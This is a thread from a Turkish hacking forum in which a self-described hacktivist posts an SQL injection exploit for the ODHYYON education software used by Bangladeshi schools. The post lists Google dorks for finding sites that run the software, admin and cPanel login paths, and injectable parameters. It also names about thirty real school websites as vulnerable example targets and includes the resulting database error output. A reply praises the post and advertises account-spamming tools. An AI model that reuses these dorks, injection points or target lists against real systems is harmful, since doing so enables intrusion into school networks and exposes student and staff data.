Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Odhyyon Addie Soft LTD BD Edu SQL Inj Exploit
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,371 / 1,371
Deneyim: 87 / 100
Rep Sayısı: 2755
Mesaj Sayısı: 6309
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Odhyyon Addie Soft LTD BD Edu SQL Inj Exploit
04.11.2018 15:53
################################################################################​#################

# Exploit Title : Powered by ODHYYON A product of ADDIE Soft Ltd Bangladesh Education SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 05/11/2018
# Vendor Homepage : odhyyon.com ~ addiesoft.com
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : v1.16.05.11 - Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.7.2623.0
# Google Dorks :
intext:''Powered by ODHYYON, A product of ADDIE Soft Ltd.''
intext:''Copyright ©2016,ODDHOYON Education ERP, A Product Of ADDIE Soft Ltd.''
inurl:''/PublicSite/Bangla/'' site:edu.bd
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

################################################################################​#################

# Admin Panel Login Path :

oems.DOMAINADRESSHERE.edu.bd

admin.DOMAINADRESSHERE.edu.bd/LogIn.aspx

mail.DOMAINADRESSHERE.edu.bd:2096

# Student/Parents Portal Login Path :

admin.DOMAINADRESSHERE.edu.bd/SPLoginWebPage.aspx

# CPanel Admin Login Path :

mail.DOMAINADRESSHERE.edu.bd:2096/openid_connect/cpanelid?goto_app=
&goto_uri=%2f&parameterized_form=&theme=&user=

mail.kgsck.edu.bd:2096/openid_connect/cpanelid?goto_app=&goto_uri=
%2f&parameterized_form=&theme=&user=

id.cpanel.net/oauth2/authorize?scope=openid+profile+email&state=%7B%22goto_uri%22%3A%22%2F%22%2C%22
external_validation_token%22%3A%22RtGGR0NsOeSgz5mP%22%2C%22goto_app%22%3A%22%22%​2C%22
parameterized_form%22%3A%22%22%2C%22action%22%3A%22login%22%2C%22service%22%3A%2​2webmaild
%22%2C%22token_denied%22%3Anull%7D&access_type=offline&redirect_uri=https%3A%2F%2F
ip-[WRITE-HERE-WEBSITE-IP-ADDRESS].ip.secureserver.net%3A2083%2F
openid_connect_callback%2Fcpanelid&client_id=cpanel.19745557&response_type=code

################################################################################​#################

# SQL Injection Exploit :

/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=[SQL Injection]

/PublicSite/Bangla/News_DescriptionWebForm.aspx?NewsId=[SQL Injection]

/PublicSite/Bangla/MessageFromPrincipleWebForm.aspx?TopMenu=[SQL Injection]

/RedirectPage.aspx?Url_ID=[SQL Injection]

################################################################################​#################

# Example Vulnerable Site =>

[+] glabdhaka.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=4124'

[+] zcpsc.edu.bd/PublicSite/Bangla/News_DescriptionWebForm.aspx?NewsId=1%27

[+] apsclschool.edu.bd/PublicSite/Bangla/MessageFromPrincipleWebForm.aspx?TopMenu=1%27

[+] eusc.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=6%27

[+] rbhs.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=3%27

[+] lalmatiagirlshighschool.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=35%27

[+] vnsc.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=3114%27

[+] mgili.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=57%27

[+] uttaramodelcollege.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=2%27

[+] bcsirscd.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=1%27

[+] kgsck.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=43%27

[+] tghs.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=1047%27

[+] jlhs.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=1048%27

[+] gfsc.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=17%27

[+] rcms.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=1063%27

[+] bafsk.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=179%27

[+] mmesc.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=7%27

[+] bmghs.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=13%27

[+] khilgaonghs.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=9%27

[+] mmhs.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=11%27

[+] mthschool.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=4%27

[+] jusc.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=6%27

[+] warihighschool.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=1%27

[+] trsc.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=1%27

[+] imamgazzalisc.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=1%27

[+] soshgcdhaka.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=1%27

[+] shaheedsmrityhighschool.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=1%27

[+] anandamoyeeghs.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=1%27

[+] bkspps.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=1%27

[+] mgscn.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=1%27

[+] oemsbd.com/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=1%27

################################################################################​#################

# SQL Database Error :

SQL Server Setup Failure : Input string was not in a correct format

You have an error in your SQL syntax; check the manual that corresponds to your

MySQL server version for the right syntax to use near ''4''' at line 1

Server Error in '/' Application.
Object reference not set to an instance of an object.
Description: An unhandled exception occurred during the execution of the current web request.
Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.NullReferenceException: Object reference not set to an instance of an object.

Source Error:

An unhandled exception was generated during the execution of the current web request.
Information regarding the origin and location of the exception can be identified using the exception stack trace below.

Stack Trace:

[NullReferenceException: Object reference not set to an instance of an object.]
EMS_Oddhoyon_Web.PublicSite.Bangla.MessageFromPrincipleWebForm.BindMessage() in
F:\Work\APSCLHS Website\OEMS_V2_Web\EMS_Oddhoyon_Web\PublicSite\Bangla\MessageFromPrincipleWebFo​rm.aspx.cs:51
EMS_Oddhoyon_Web.PublicSite.Bangla.MessageFromPrincipleWebForm.Page_Load(Object sender, EventArgs
e) in F:\Work\APSCLHS Website\OEMS_V2_Web\EMS_Oddhoyon_Web\PublicSite\Bangla\MessageFromPrincipleWebFo​rm.aspx.cs:45
System.Web.UI.Control.OnLoad(EventArgs e) +102
System.Web.UI.Control.LoadRecursive() +67
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +1384

Version Information: Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.7.2623.0

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.



Alinti
Rep Verenler: Dessy
Dessy
*
avatar
Yarbay
Durum: Çevrimdışı
Seviye Puanı: 21
Yaşam Puanı: 271 / 522
Deneyim: 89 / 100
Rep Sayısı: 102
Mesaj Sayısı: 568
Üyelik Tarihi: 20.11.2015
     
Yorum: #2
Cvp: Odhyyon Addie Soft LTD BD Edu SQL Inj Exploit
08.11.2018 08:26
eline, emeğine sağlık reis.

İnstagram Sınırsız Hesap > Git
Youtube Sınırsız Hesap > Git
Sosyal Medyada Sınırsız Hesap Açma p2 Yakında.
Alinti



1 Ziyaretçi